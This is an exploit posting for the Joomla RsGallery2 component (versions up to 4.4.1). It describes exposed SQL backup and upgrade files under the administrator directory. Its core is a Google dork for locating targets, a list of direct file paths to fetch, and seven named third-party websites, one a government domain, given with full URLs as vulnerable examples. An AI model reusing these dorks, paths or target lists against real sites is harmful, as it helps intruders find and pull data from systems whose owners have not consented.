facebook facebook twitter rss

Joomla Com_RsGallery2 Components 4.4.1 Database Backup Disclosure

Author: KingSkrupellos , Published: 16-12-2018

# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : rsgallery2.org ~ extensions.joomla.org/extension/rsgallery2/
# Software Download Link : rsgallery2.org/index.php/download
+ github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip
+ github.com/RSGallery2/RSGallery2_Component/releases
+ github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql
+ github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0 ~
4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator

# Exploit :

/administrator/components/com_rsgallery2/sql/rsgallery2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql

/administrator/sql/updates/mysql/3.0.0.sql

/administrator/sql/updates/mysql/4.0.0.sql

/administrator/sql/updates/mysql/4.3.0.sql

/administrator/sql/updates/install.mysql.utf8.sql

/administrator/sql/updates/uninstall.mysql.utf8.sql

#################################################################################################

# Example Vulnerable Site =>

[+] itsi.co.id/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+] theglen.ca/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+] airnews.co.za/home/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql

[+] osmiebkk.moe.go.th/2-administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+] bunker.linkbg.com/polifron/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+] protech-me.com/httpdocs/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+] wohnbautreppen.com/treppen/administrator/components/com_rsgallery2/sql/rsgallery2.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :